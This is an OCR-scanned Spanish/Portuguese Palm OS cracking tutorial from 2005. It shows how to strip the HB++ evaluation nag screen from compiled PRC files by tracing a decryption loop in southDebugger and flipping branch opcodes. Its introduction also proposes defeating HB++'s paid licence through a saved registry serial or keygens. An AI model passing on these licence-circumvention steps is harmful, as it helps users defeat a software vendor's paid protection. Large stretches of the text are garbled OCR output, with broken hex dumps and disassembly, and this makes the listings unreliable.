SE Alerts 39 00002 4e4fal92 TRAP R15,$2192 = sysTrapFrmilert 
1000 Error ! E ooon20f2 303c3039 MOVE.W  f12345!'$3039,DO 


1100 Untitled : 000 E 544f ADDO.W 2,147 
1200 Application infected | 2442 000 606a BRA 253 
1300 “iras found | 24 oooo20f: 3f3coooe L250 MOVE.W  H$14!'$e,- (247) 
1400 F-Secure AntiAirus : Doo0o020f 24ebaD0256 JSR L310 


=] 
OY References 48 00002102 36 


ooo 


0002003 ono 


cure Ant iras 
nCces oo000210c 4e4fal92 TRAP H15,$1192 
00020ea DODOZ 303c1535 MOVE. V 215 
0002108 o00 5449f ADDO.W H2,147 
0002004 E 00002 6 6040 ERA L283 

+ re Anti irus : DODOZ a] q456ef PELA -1201261 
+ ima nd ooo ; 


Ú 
O] 
y 
3 


sTrapFrmilert 


(uN) 
E 
158] 
[uN] 
pu 


AS 

m 

o 
Dm 

o 
O Uk 

a] 


2 JSR L318 
Strings 2455 000 1£3c0007 MOVE.B  $7,-(27) 
000 2f2eff0c MOVE.L  -116(26),-(247) 
s7 000 1£3c0019 MOVE.B  H25!$19,-1(27) 
000 Sbeffef PEA -26(46) 


H 
" Hh 
10 
O 


ooo 
DoOD 
000 


o 
e 
a | 
Ti 

J 
a) 


JSR L347 
LEA L234,A40 
PEA (10) — 


DR mm 


in H 

O 
[mu] 
0] 
ay 
AS 


A E NS ES E SS 
00 


Doo 1fa0030 LEA L285,40 

a50 PEA (20) 

Sbeffieb PELA -2¿6/16) 

Í3cos7?s MOVE.  F41400!/$578,-(147) ; F-Secure Ainti-Y 

5 000 4e4fal94 TRAP H15,$14194 = sysTrapFrmCustomilert 
DoDoZz . 4fefODle LEA 301247),147 
oo0o0o0z 4227 L282 CLR.B —(1A'?) 
Dooo02152 437500085 PEA 
Doo 456de995 PEA ] 
7 = E Da 


(43) 
0000215: 4e4fa027 TRAP $15,314027 
| 


m 


ANEYTEADOO EFEC via NAAA ANA AAA A AAA MAA A A ec ra 
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FIG. 11 


Ela está logo abaixo da anterior. Nota-se que ela é executada condicionalmente pelo BEQ L282 logo acima. Entáo substituímos o BEQ por BRA, assim: 


Prcedit 
File Edi 


nsert View Tools 


mb 00002144 
«$ 0000200a 


As 


=- + 1500 F-Secure Ant-Virus 


= y Reterences 
sw) 000020ea 
=» 00002108 
« 00002004 


* 1600 F-Secure ArtiWVrus 


% 1700 Warning 
UU Stmgs 
QU DaaD 
ÍY deb 
y Keywords 
YY Changes 
LY Search Results 


$ HH E 


Za 


e, 


0x21D0: 
0x21E0: 
0x21F0: 
0x2200: 
0x2210: 
0x2220D: 
0x2230: 
0x2240: 
Ox2250: 
0x2260: 
0x2270: 
0x2280: 
0x2290: 
0x22A0: 
0x22B0: 
0x22C0: 
0x22D0: 
0x22E0: 
0x22F0: 
0x2300: 
0x2310: 
0x2320: 
0x2330: 
Ox2340: 


ed pre | ACP | code0001 | 


7 6668 
4E4F 
672A 
487A 
FEEO 
2F0A 
4E4F 
4ESE 
4E4F 
000c 
4E4F 

BA 
AlAS 
4ES6 
6000 
4E71 
4E4F 
4EBA 
A192 
0392 
FFE6 
4850 
001E 
7000 
4E56 
48E7 
E6FA 


2 001 
2FOA 
0578 
6036 
487A 
F8BA 
' 2FOA 
245F 
FFE8 
4FEF 
DONO 
FFE8 
4E4F 
4E75 
7000 
5340 
OSDC 
DODE 
' 4E4F 
4EBA 
486E 
0030 
4FEF 
A027 
0000 
0000 
4EBA 
302E 
0156 
6720 
6706 
4EBA 


Salve e sincronize o fsav.patched.prc para o Palm. 


Afer Ventus 


Brasil 


post nubila(Wyahoo.com.br 


Palm Spanish Tutor: 


[E lArquivos de Programas WStanleyWPalmiCrackiPRCsifsav.patched.prc] 


362A 


A174 
0C43 
FC20 
2FOA 
4E4F 
A19F 
4E75 
A11D 
6630 
A1BF 
FF 3E 
504F 


a 
Q 


0094 
5340 
A192 
0286 
303C 
1F3C 
4EBA 
496EÉ 
4227 
4FEF 
0000 
1038 
3600 
6764 
6700 
6704 
6000 
4EBA 
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0008 
5C4F 
044C 
2F DA 
4E4F 
A19F 
504F 
4E56 
486E 
486É 
4400 
4A00 
OC6E 
2F03 
4EBA 
67B 

3030 
3600 
1538 
0007 
0678 
FFE6 
4878 
000A 
4E4F 
3F 2E 
5C4F 
5740 
0130 
6000 
0132 
FFec 


3F03 
0C43 
6716 
4E4F 
A19F 
504F 
7001 
FFE6 
FFE8 
FFE6 
AFEF 
584F 
0016 
4EBA 
OSFC 
5340 
a39 
544 
544F 
2F2E 
41FA 
4E71 
0008 
261F 
A141 
DDOE 
6706 
6700 
0440 
013E 
3F 3C 
544F 


4E4F 
OSDC 
0043 
A19F 
504F 
600€ 
6002 
4878 
4E4F 
486É 
D00c 
6604 
FFE8S 
E28C 
3600 
6712 
544F 
Boxo 
6040 
FF8c 
0034 
4E71 
486D 
4ESE 
4ESE 
2F3C 
3003 
008A 
7FF9 
4EBA 
044C 
6000 


FIG. 12 
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"Colabora con tus Proyectos" 


Palm Spanish Tutor 


Protección: | ()Serial ()HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Nag 


Descripción: | Programa para crear aplicaciones para palm al estilo Visual Basic.Net Sin Runtime 


Objetivo: | Quitar Nag de programas compilados "*PRC" con la versión de prueba 


Dificultad: |()NewBies ( )Intermedio (X)Avanzado ()Master ( )Gúru 


DOWNLOAD: | http: //www.handheld-basic.com 


Herramientas: | SouthDebugger, PRCedit, PilotDis. Palm Real ó Pose emulador, UltraEdit-32, PalmDemon 0.27 ,PalmDebugger 


Palm CRACKER: By Nubila | FECHA : D/02/0ct/2005 


INTRODUCCION 


Fecha de lanzamiento Abril 2005 

HB++ 1.04.766.1150 

HB++ 1.05 

Download Link 10:34 a.m. 14/03/05 [8.67 MB] 
http://www.handheld-basic.com/download.php?Fileid=6 
http://download.pdassi.de/files/15106/hbsetup.exe hb++ 1.05 
Ho++ para trabajo en equipo server 10:37 a.m. 14/03/05 3.30 MB 
http://www.handheld-basic.com/download.php?Fileid=500 


Help For created RegFile Or Serial Nummber Or Patch 
Protection:Serial Number And ID Machine+ID Windows 
Price:US$500 


Software para crear aplicaiones en PDA palm 

Usa el mismo lenguaje Visual Basic.net 

sofware by create aplication Palm stile Visual Basic Not require runtime who 
appforge crossfire 6. 


Lo que lo pone en primer lugar como el desarrollador de Software PDA 

Lo mejor es que no crea runtime como lo hace AppForge Crossfire 5.0 

HB++ 1.04 segun especialitsas de Pc Magazine AppForge ha quedado desbancado 
por HB++, Un software Aleman de Peter Consoulting 

PdaToolBox es un miligramo comparado con este. 

Ademas de que crea archivos pequeños al estilo CodeWarrior 9 for Palm 

Este software ha usado por IBM,HP,Compaq, Siemens,Nasa,entre otros lo que lo 
esta poniendo en primer lugar 

La versión Shareware se puede descargar de: 

www.handheld-basic.com/ 


8.67 MB Aprox Trial ,No se permite renaudacion por el servidor. 
Lo malo es que lo convierte en software mas caro que CodeWarrior 9 for palm Os 
con Us$500 ,para una clave que te mandan por correo, ó un cd por servicio de 


correo postal. 

Si no se registra al instalar las aplicaciones en la PDA y despues de 30 dias 
pone el mensaje de que es una versión no comercial pero las aplicaciones las 
hace totalmente operativas. 

El programa bajo windows es 100% operacional la unica diferencia es que las 
aplicaciones que son echas para Palm Os e instaladas en la PDA ,no se podran 
comercializar pero son 100% programables sin ningun limite de código como lo 


hace codewarrior que solo se limita a 14kb de código en este caso no pasa esto. 


Al cargar una aplicación echa con HB++ trial al pasar el programa 7 dias 
instalado en la palm nos mostrara el mensaje de que esta aplicación fué creada 
con una versión shareware y que no puden ser distribuidas esta aplicaciones 
comercialmente. Sotfware caro con Protección desente y con númerosos trucos 
para despistar a los SoftlIstas de lo ajeno. 


Parece que hb++ 1.04 hace un ID de acuerdo al Hardware 
Una protección algo decente para los $500 Us que se están pagando 


probablemente reviza 

XXXXX-XXXXX-XXXXX-XXXXX-XXXXX Clave de windows 

oem DE WINDOWS 

XXXXXXXXXXX o. . 0.0.0. 

y crea un codigo unico del Hardware y Sistema operativo temporal por 30 días 
cada que se instala el programa ,así que lo vuelves a instalar tendrás que 
volver a pagar otros Us$500 dólares ya que crea claves aleatorias pero que 
fácilmente se pueden solucionar encontrando una clave serial guardada en el 
registro de Windows y posterior mente crear un repaldo de esa parte del 
registro donde se instala el programa, primero se debera de (borrar las claves 
en el archivo REG y en ese mismo escribir toda la configuración), así cada que 
se instale el programa y ejecútenos este REG file nos validara el Serial 
encontrado, Por que borramos la configuración previa) esta es una opción, Otra 
Opción seria crear el KeyGen pero nos tomaria Más tiempo en razonarlo quizas 
semanas Ó meses: 

En la ventana de Registro de programa aparece un Código Unico ID Maquina 
software: 

NOTA: (En este caso no entraremos en temas de cracking para windows xp), 

solo nos limitaremos a buscar una solución al PRC compilado. 

NOTA: es recomendable buscar Ó crear un parche para este programa bajo Windows 
XP, en las páginas de keygens. 


AL ATAQUE 


El objetivo de este tutorial sera Quitar la Nag de inicio de programas compilados "*PRC" con la versión de prueba de Hb++ 1.05.973.1309 que después de los 7 dias de uso 


se muestra al cargar la aplicacion. 


Con este programa que corre bajo windows XP (HB++) podremos crear keygens y ejecutarlos desde la propia palm muy fácilmente, 
lo mejor de todo es que no requiere ningún tipo de runtime en la palm como lo hace 
ya que requiere archivos runtime en 


es como utilizar el Visual Basic pero para palm, 
AppForge (Otra aplicación para crear aplicaciones al estilo Visual Basic pero demasiado basura, 
la palm que útilizan poco mas de 700Kb y si tenemos una palm de 16 MB ¿que? ). veremos como quitar la nag de los archivos 


compilados con Palm. 


Como patchear programas feitos no HB++ versáo 1.05.973.1309 náo registrado. 


Como parchar programas compilados con la versión HB++ 1.05.973.1309 no registrada 


ya que 


Os programas criados com a versáo náo registrada do HB++ apresentam uma nag screen conforme a FIG. 1. Entretanto essa nag screen só aparece no palm e 
náo aparece no POSE. Isso significa que o programa usa a sysTrapHostControl para detectar se o programa está rodando no POSE ou no Palm. 


Los programas creados con la versión no registrada de Hb++ presentan una nag sreen , mostrada en la figura. 1, Entre tanto esa nag sreen no aparece 
en la palm ni en el emulador POSE, Eso significa que el programa usa la api "sysTrapHostControl" para detectar si el programa esta instalado en la Palm 
ó en el emulador POSE. 


information o 
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For non cormmercial use only 
Powered by HE++ Evaluation Merzior 
http handheld-basic.corr 


FIG. 1 
Se tap no “” no canto da nag screen aparece o form da FIG. 2. 


En la Fig.2 No aparece la siguiente nag sreen. 


"This freeware is compiled 
using HB++ Evaluation 
version. 


= lf you bought this 
freeware, you have been 
abused. Refer us to: 
abuserhandheld-basic.corn 


"Unregistered use of HB++ 
Evaluation version for 


| Done ] 


FIG. 2 


Para fazer a nag screen aparecer no POSE rode o southDebugger e adicione um breakpoint no sysTrapHostControl. Quando ele atingir essa Trap o código da FIG. 
3 aparece. 


Para saber si aparece la nag sreen en el emulador POSE corremos el southDebugger e introducimos un breakpoint con la api "sysTrapHostControl", 
Cuando se encuentre esa función el debugger parará en el siguiente fragmento de código, ver figura. 3 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


x= 


Blesa) CE (E 


[ main | 


Li, 


12€, 


| disassembler [PC] 


v | 00034308 


command 


2DD0Q.W $32, A7? 
TST.L Do 
ENE $446 171BE ¿ODO324DO 
ELE. -(A7) 

codos MOVE . 1 $35, -(1A7) 
CLR. 1 -(A7) 
MOVE.E *?l, 
MOVE. $92 1750, -(A7) 
MOVE. $156!/739C, -(47) 
MOVE . 1 Fo661342, - 147) 
MOVE. $92, -(A7) 


LEA $-164!3-A4 (PC), AO 
MOVE . 240, - (47) 


3F30 MOVE. Fl, 
4E4FA32B TRIP FISIFF, g41771/3232B [sysTrapFruNevForm] 
2D48FFCE MOVE. AO, E-SOl$-321A6) 
4FEFOO16 LEA $22 1$16(27) 
BEQ $392 !gl88 
MOVE. gl1000!$3E 
2F307441494E MOVE. F19504356621; 
4E4FA060 THAP $1S!IFF, $410: 
MOVE . A0, D3 
2DDO. $F6, 27 


Pos 
to 


Os 
o 
o 
CS] 
to 
Ha 
[ur] 
o 


lea 
-«] 


in e 1 
DS 
e 
SS 


4 


24 
D4 


NAN2223n09 4rR4rP217244 TR23rD $415 12<p £42170€E121244 [ereTrarnHner"antrrr1l] 


00032308 4E4F2344 TRAP H15!5F, $41796!/54344 [sysTrapHostControl] 


oO 


FIG. 3 
Mude BNE para BEQO. Pra isso clique com o botáo direito do mouse sobre a linha que mostra 
“BNE ¿1446!$1BE ;0003A4DO0 “ e escolha a opcáo “change memory content”. A tela conforme a FIG. 4 aparecerá. Mude o valor “66” para “67”. Clique OK. 
Cambiaremos la instrucción BNE por BEQ, para ello clickemos con el botón derecho del mouse sobre la linea mostrada 


“BNE ¿1446!$1BE ;0003A4DO0 “ seleccionamos la opción “change memory content” (cambiar contenido de la memoria). Aparecerá un menú como el de la figura.4, 
Cambiar el valor "66" por "67" y presionamos Ok. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


JB (e CB ELE 00 
— disassembler | breakpoints 


/ main | 


command 


544F ADDQ.Wo $32, 47 
4280 TST.L DO 
a 6S6D001BE ENE $446 IS1BE ¡O003A4D0 

00034314 J 4267 CLER.W - (47) 

6 9< 3F3C0005 MOVE. $35, -(A7) change memory content 
4267 CLE.W - (47) 
1F3C0001 MOVE. $31, -(47) 
3F3C0050 MOVE. FOZIF5C, (47) 
3F3co0020 MOVE. FIS6I$3C, -(A7) 
3F3 


a 
; 
3F3 


5, Enter hex values. 


: 660001BE 
1042 MOVE . 1 ob !1jd2, -147) Cancel 


2 MOVE. $32, - (47) 
4lFAFFSC LEA $-164!5-A4 (PC), AO 


2FO0S MOVE. 20, - (47) 

3F3cCo0001 MOVE. $71, -(47) 

4E4FA3Z TRAP FISIFF, f£41771/72432B [sysTrapFriNevForm] 
2D4SFFCE MOVE. 20, $-50!7-32126) 


-=H. ¿D4SFFCE MOVE. L 

DD... 4FEFOO16 LEA 

y. BED 

MOVE . Y f1000!: 

¿ta IN ¿F3C7441494E MOVE. L f1950435662!$7441494E, -(27) 

NO. 4E4FA2060 TPAP F15!5F, $41056!/$24060 [<ysTrapDmcetlResource] 

á. ¿608 MOVE. L 20, D3 

Xx. 5CsSF 2DDO.L $36, A 
AD Y] | A2 A3 ñ4 A5 | A6 A7 [EP] 
DO D1 | D2 D3 D4 D5 | D6 D7 USP | 


[00000000-000344E0]: 


00034308 4E4FA344 TRAP H15!5F, f41796!/54349 [sysTrapHostControl] 


FIG. 4 


Com isso fazemos a nag screen aparecer no POSE. Como o BEQ é o inverso de BNE, significa que a nag screen agora aparece no POSE e náo aparecerá mais 
no Palm. Agora precisamos descobrir onde esse código está no .PRC para patchear. 


Abrimos o programa com o prcEdit, pressionamos CTRL+F e tentamos localizar a palavra “Host”. O prcEdit náo vai encontrar conforme a FIG. 5. Isso quer dizer 
que o código está criptografado. 


Con eso forzamos a que la nag sreen no aparezca en el emulador POSE, Como la instrucción BEQ es inverso de BNE, Significa que esa nag screen no 
apareceré en el POSE y por lo tanto no aparecerá más en la Palm real, Ahora buscaremos el código que debemos de parchar en el PRC y encontramos 
que no existe. 


Abrimos el programa con PrcEdit, presionamos CTRL+F e intentamos localizar la palabra "HOST". PrcEdit no encontrará esa palabra , e muestra la 
fig.5 , esto nos dice que el código está encriptado. 


Prcedit - [code0001.s] 


Window Help 
Molecule patched. pro 


oDoOoo0oo00o 
0000004 
pdodDooos 
oDo0o0oooe 
ooooo0o10 
00000014 
pdoonDoo1s 
ooo0o0o0o1e 


186 00000024 
11 00000028 
12 DODODOZ ce 
13 DODOOOZe 
14 OOD00030 
15 00000034 
17 DOODOOSece 
13 ono000040 
19 00000044 
¿6/0 p00000485 
21 00000040 
22 DOODOOSO 
23 DO00D00054 
24 OOO0O00oOss 
25 OOODDOSc 
26 00000060 
er 00000064 
23 00000068 
23 OODODO6c 
38 OODoODor7o 
a1 00000074 
32 OO0o00007s 
33 0000007 
34 OOo0o000so 
E 


RCP 


code0007.s | code0002.s | code0D03.s 
ooo0o0o0o0d1 Li DC.V 
qgeS56ffío DC.W 
q4se7?1135 DC.W 
42aefffoO DC. W 
artcb99ca DC.V 
S5Scadote DC. W 
fTffc4súe DC.V 
Trf5456e DC.V 
Tr1f944e49f DC.W 
alof4fef DC.W 
000c4a40 DC. 
6706 DC.V 
Off MOVEO 
6o0b0ooofa ERA 
206efff4 DC. V 
3981045 Y 
Jae Information VW 
65De7?2 VW 
e9dad2D Y 
DoODooo UY 
6o0D0000o VW 
?OSfbo VW 
651530 Y 
D0640ffé TU. 
q43co7201 DC.W 
ela92030c DC.v 
ooo0Do0ooo DC. W 
c2806700 DC. 
Dlae?abO DC.W 
¿2end3025 DC.V 
ooo0é63200 DC.W 
02410004 DC. W 
36000243 DC. 
o0103co0 DC.V 
024600085 DC.V 


HO, H1 A 
H20054,H$-16 = 
H15663,f7992 
H17070,$-16 
H-26677,H-26164 
H-27190,f18542 
H-4,R18542 
H-3,R10542 
B-12,£20047 
H-24433,120463 
$12,£19008 
H26374 

$-1,DO 

L4 

$68302,$-12 
$14352,f18628 
H28703,H-20348 
225870, 29185 
$-5719,f$8252 
HO, $1 
H24576,$26 
H28735,$-20348 
$25880,f$12292 
H1600,f-32 
Hlis624,f29185 
B-7767,$8252 
HO, 0 
H-15744,26368 
H174,R31232 
$11789,$$12328 
$6, R12300 
$577, 
H13824,$579 
$16,415360 
H502.$6 sl 


Done 


'¿ Iniciar 


1, Po E: 13:07 


Abrimos o programa entáo com o prcExplorer. Na FIG. 6 vemos que alguns resources estáo em negrito e outros náo. Os resources que estáo em negrito 
significam que sáo reconhecidos pelo precExplorer como do sistema e os resources que náo estáo em negrito significam que o prcExplorer náo os reconhece 
(resources do usuário). 


Abrimos el programa con PrcExplorer, Ver Fig.6 vemos que algunos códigos están en negrita y otros no, los códigos que están en letra negrita indican 
que son reconocidos por PrcExplorer como código de sistema, y los códigos que no están en letra negrita significan que PrcExplorer no reconoce este 
código (Códigos del usuario) 


Molecule - Palm Application Explorer 


File Edit View Help 


> $4 LJ 


Resources de usuário (náo 
reconhecidos pelo prcExplorer) 


Name: Molecule 


Talt (1) 


+ clut (4) 
S ROS Fri ug 05 20:51:10 Modificatigaetf ¿10 05 20:51:10 2005 
+ data (1) 
hb (2) Last Backup: Fri £ua 05 20:51:10 
+ pref (1) Alttributes 
+ EAIN (1) 
+ EFRM (1) 
+ ESTL (3) 
+ ESTR (1) 
+ tver (1) = 
Bloc (2) Resources reconhecidos 
pelo prcExplorer. 
Header: 
DOOO: 4D 6F 6. 65 63 75 6f£ 65 00 00 00 00 00 00 00 00 Molecule........ 
¿ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 42 
0: 00 01 00 01 BF 19 AB EE BF 19 AB EE EF 12 AB EE 
0030: 00 00 00 00 00 00 00 00 00 00 00 00 61 70 70 60 
0040: 68 62 4D 4F 00 00 00 00 hbMD.... 


FIG. 6 


Os recursos criptografados devem ser descriptografados na memória e pra isso deve-se primeiramente pegar o ID do recurso com sysTrapDmGetl Resource e 
depois alocar memória usando o sysTrapMemPtrNew. 


Los códigos que estén encriptados deben de ser desencriptados directamente en la memoria, para ello primero debemos de escribir el ID del recurso 
con la llamada a la API "sysTrapDmGetlResource" y después almacenar en la memoria usando una "sysTrapMemPtrNew" 


Pela lógica, o programa deve alocar memória usando a sysTrapMemPtrNew e só depois descriptografar o código nesse novo local de memória. Entáo vamos 
adicionar um breakpoint no sysTrapMemPtrNew e em seguida procurar por 4E4FA344 que é o opcode de TRAP ++15!$F, 41796!1$A344 [sysTrapHostControl]. 


Como funciona? Depois de alocar memória procuramos por 4E4FA344. Se encontrar quer dizer que o código de descriptografia está depois do 
sysTrapMemPtrNew anterior. Com isso saberemos exatamente quando a descriptografia ocorre. 


Iniciando o procedimento: (AL ATAQUE) 


Antes de comecarmos a procurar devemos fechar o POSE (sem salvar) e o southDebugger para limpar o buffer da janela disassemblada. Iniciamos novamente o 
POSE e o southDebugger. Adicionamos um breakpoint usando o Grafitti conforme descrito em outros tutoriais para entrar no modo debug. 


Agora adicionamos um breakpoint na sysTrapMemPtrNew e teclamos F5. Rodamos o programa feito no HB++ e quando uma sysTrapMemPtrNew for encontrada 
o southDebugger assume o controle. 


Agora teclamos F5 novamente. O POSE vai executar essa sysTrap e vai parar novamente na próxima sysTrapMemPtrNew. 


Na janela “disassembler” do southDebugger clicamos no binóculo “FIND” e procuramos pelo opcode 4E4FA344 conforme FIG. 7. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


Bites cel (EE O O 


cominand notes 


éboo0o0400 


BRA 


$1024!173400 ¡PrvHandleEvent+00000D94=10019C0390 


1001 Z 4403 
1001 4 g- 6704 9A4=1001989A 
1001 : No dE4FAOBE TrapSyelaunchlonsole] 
o EN A find what: [4e4fa344 
1001 e EDODOSFZ SCI match case | | E+FODODODIA=10019C90 
1001 J. 42403 = 
1001 g. 6714 le) hex lesions 00009C2=100138E8 
1001 ZE. 1F3CODLE Ci note from: [a0ooo0000 
1001 q... 3F302710 to: 00s00000 
1001 ¿MIDI 2¿F3C4D4o944a an) 
1001 NO.n 4E4FA36E cancel TrapS$ndPlayinfResource] 
1001 PO 504F 
1001 p- 2001 MOVEO $31, DO 
1001 > £00003D4 ERA F930!173D4 ¡¿PrvHandleEvent+00000D94=10019C090 
1001 J. 4403 TST.E D3 
1001 g- 6702 BE0 $£10/54 ¿PrrHandleEvent+000009Dé6=100198C0C 
1001 E. 1F3C0003 MOVE.E $33, -(1A7) 
1001 NO.4 4E4F2A234 TRAP FISIF¿F, $41524 524234 [sysTrapSndPlaySystenSound] 
1001 TO 544F ADDO. Y $32, A7? 
1001 pP- 2001 MOVEO $$1, DO 
1001 MS a] ERA F960!173C00 ¿PrvHandleEvent+00000D94=10019C090 
1001 J. 4403 TST.E D3 
AD | A1 [ 22 [ A3 Il AA | AS [ A6 | A7 ope |] 


A0 | M1 [ A2 | A3 | M4 A5 A6 A7 E=>P05 


DO [| D1 | D2 l D3 | D4 D5 D6 D7 | USP 


[10018EF6-10019C98]: PruHandleEvent 


PruHandleEvent 
10019 c 2001 MOVYEO 231, DO 
is Iniciar Zo E Como patchear... =' Palm OSO Emul... EX] southDebugger N couthDebugger... j MAA 


FIG. 7 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


IBrl(e4 E 1515 OY 


dechex 000498B2 


addr ascii | hex command 
000498B2 4E4F21344 TRAP $15!;5 41796 4 [sy=sTrapHostlontrol] 
000498B6 544F ADDO.v a 
0004983B3 S. / Ñ SUBO. L 
00049S5B,A al BEEN 
DO00493BC a. 200 MOVE0O 
000495BE -X.Pp 2 27 ¿ND.v 
0004 4 E SUBO. W 
Do0o049sc Ja 57C0 SEO 
00049 ; PE 4400 NEG.E 
00049 ; Fe 1600 MOVE.E 
0004 a 422E0008 TST.E 
: 208 BEO $733 ¡Enablecraffiti+00000032=000498D8 
0004 20 ES E ? ¿NDI.V $$-9 id E? IPFEFF?.W 
Ñ ANDI.W $24! DOC, F£12/$C140,D6) 
Do0o0d4 ; J-.U ) 55 TST.B 3 
0004 JN q. 6706 BEN $36 ¡Enablecraffiti+O0000003E=00049S5E4 
000498D e ORI.W É 0 
A ANDI.V £aD0939 171003, £73(240,D1) 
000495E6 á. Z6 MOVE. L 
DO0049SES 7 4ES UNLE 
DO00493EA 4E75 ETS 
D00O049SEC A SE45 OR. .W 
D0049S5EE 6E6 EGT 
0004983F0 EHI 


A0 I At [ A2 [| A3 l Ad l AS [| A6 l A7 [| PC 


PruHandleEvent 


10019882 7001 MOVEO $1, DO 


is Iniciar 6 O ” Uh comopatchear... — PalmOSQEmul... - 5 southDebugger BN couthDebugger... e ERA HO ass 


FIG. 8 


O southDebugger encontrará o código conforme a FIG. 8. Compare a FIG. 8 com a FIG. 3. Veja que sáo diferentes. Isso significa que o código que procuramos 
ainda náo foi descriptografado. 


Tecle F5 novamente e procure (“FIND”) novamente o opcode 4E4FA344. O código da FIG. 3 ainda náo apareceu. 
Tecle F5 novamente e procure (“FIND”) novamente o opcode 4E4FA344. O código da FIG. 3 ainda náo apareceu. 
Tecle F5 novamente e procure (“FIND”) novamente o opcode 4E4FA344. O código da FIG. 3 ainda náo apareceu. 
Tecle F5 novamente e procure (“FIND”) novamente o opcode 4E4FA344. O código da FIG. 3 ainda náo apareceu. 
Tecle F5 novamente e procure (“FIND”) novamente o opcode 4E4FA344. O código da FIG. 3 agora apareceu!!! 


Note que teclamos F5 6 vezes. O código foi descriptografado quando o POSE executou do passo 5 para o passo 6, ou seja, teclamos F5 5 vezes e náo havia o 
código descriptografado, quando teclamos F5 pela 6? vez, o código apareceu. 


Agora que sabemos quando ocorre, vamos fazer tudo novamente (feche o POSE sem salvar e o southDebugger e execute-os novamente depois entre no modo 


debug e adicione o breakpoint na sysTrapMemPtrNew). A diferenca é que teclamos F5 5 vezes e em vez de teclar F5 pela 6? vez, vamos executar passo a passo 
teclando F8, ou seja, teclamos F5 5 vezes e depois teclamos F8 até descobrir onde ocorre a descriptografia. 


Após teclar F5 5 vezes, tecle F8 até aparecer o código da FIG. 9. Esse é o código de descriptografia!!!! 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


( main | 


O disassembler [PC] > ES ARS RS ON eS 0 xl DE : : RS SE NN A EN ES POSSE SS eN SR e Mono 5% o pe cÉ E] 


[decmex 00 posta a | ajiig[<]>[» 


command notes 


DOl16ECCS 363C2A21 MOVE .W $10785!$2A21, D3 
DOLSECCC 4242 CLR.W D2 

DOLSECCE 32700064 MOVEA. $106!$6A, AL 

DO16ECDZ y 4lEDEF7?E LEA $-4226!$-1082(A5), A0 
DO16ECD6 pa 3001 MOVE .W Dl, DO 

DO16ECDS > E643 LSE.W $$3, DO 

DOlG6ECDA =D"... 13302000 MOVE.B F3O(A0,D2), D4 Loop da 
DOJG6ECDE Da B104 EOP.B DO, D4 , nn 
DOLSECEO eE 15842000 MOVE.B  D4, $$0(A2,D2) descriptografia!!! 
DOJ6ECE4 5241 ADDOQ.W $$1, DL 

DOl6ECE6 Ss C3C3 MULS.W D3, Dl 

DOl6ECES 5242 ADDO.W $$1, D2 

DOLSECEA Bo. 0C4202BB CMPI.W $699!$2BB, DZ 

DOJG6ECEE 5 6FE6 BLE $-26!1$-1A ¿OO16ECDE 

OO16ECFO A 3F2E0008 MOVE. $$8 (26), -(A7) 

DOLSECF4 7 4LFAFFS6 LEA $-154!$-9A(PC), AO 

DOLSECFS a 2FO8 MOVE.L AO, -(A7) 

DOJG6ECFA a 4EB29000 JSRE $£$0(22,A1) 

DOJG6ECFE . 3600 MOVE .W DO, D3 

DOLSEDOO , ZFOA MOVE.L AZ, -(A7) 

DO16EDOZ ee 4E4FA012 TRAP Fl15!$F, f40978!/7$A012 [sysTrapMenChunkFree] 
DO16EDO6 ista 4FEFOOOA LEA $10!$A(A47), A7? 

DOLSEDOA 4443 TST.W D3 


AO A1 AZ A3 As A5 A6 A7 [A A | 
DO D1 D2 D3 D4 D5 D6 D7 USP 
[0016ECA2-0016ED1C]: 


0016Ecc4 32 


MOVE . Ta] B30671 157 7CF, Dl 


FIG. 9 


No preEdit o mesmo código é: 


00004368 3001 L401 MOVE.W D1,DO z 
0000436a e648 LSR.W +$3,DO ; Shift DO a direita 3 bits 


0000436c 18302000 MOVE.B 0(A0,D2.W),D4 ; 1é word em AO indexado por D2 
; e coloca em D4 
00004370 b104 EOR.B D0,D4 ; XOR (eXclusive OR) D4 e DO 
00004372 15842000 MOVE.B D4,0(A42,D2.W) ; grava D4 na nova posigáo de 
; memória enderegada por A2 e 
; indexada por D2 
00004376 5241 ADDQ.W  +1,D1 : 
00004378  c3c3 MULS.W D3,D1 ; 
0000437a 5242 ADDQ.W  +1,D2 ; 
0000437c  0c4202bb CMPLW 1+699!$2bb,D2 ; descriptografou todo o código? 
00004380 6fe6 BLE L401 ; náo. Faz novamente o loop 
00004382 31280008 MOVE.W  8(A6),-(A7) ; 
00004386 41faff66 LEA L398,A0 ; 
0000438a 2f08 MOVE.L AO,-(A7) ; 
0000438c 4eb29000 JSR  0(A2,A1.W) ; chama subrotina para detectar 
; onde o programa está rodando 
; (se no Palm ou no POSE) 


Para sabermos onde e quando ele descriptografa a sysTrapHostControl basta monitorarmos A2. Pra isso no southDebugger abrimos uma “new memory-based 
disassembler window” e uma “new memory dump window”. Clicamos em A2 nas duas janelas, conforme FIG. 10. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


ABRES CE (EE OQ 
| disassembler | breakpoints -  disassembler [PC] | 


[ main | 


NOP 


memory dump [40] | 


O memory dump [42] 


8/9/10 11)12/13/14 1: ascii address | ascii 18% corninand 


o 00 00 00 00 ó po 00 00 00 00 00 00 00 00 ANT co. ODO ORI.E £30, DO 


oo 00 00 00 Í 00 00 00 00 00 00 00 00 00 2.............-.-. 000 Fl DO OPI.B £20, DO 

oo 00 00 00 0-00 00 00 00 00 00 00 00 D0 ...............-. 000 ODO OPI.E Hs DO 

Do 00 00 00 00 00 DO 00 00 00 00 00 00 00 00 000 , DODo J.B $30, DO 
L2S5E 00 00 00 00 00 00 ó 00 00 00 00 00 00 o AA 0003A 2 co. DODO ORI.B £30, DO 
£E00 00 00 00 00 00 00 00 00 00 00 00 00 cc A A 000 E 000 JI.B $3 DO 

O 00 00 00 000 00 00 00 00 0 DA 000 Sc DOODO ORI.B $20, DO 


ó 00 00 00 o 00 oo 00 00 00 0 oo 00 000 DO00o... 'T.B $; DO 


oo 00 00 00 Do oo 00 00 00 00 00 ¡o A 000 3 co. DO00 'JT.B fi DO 
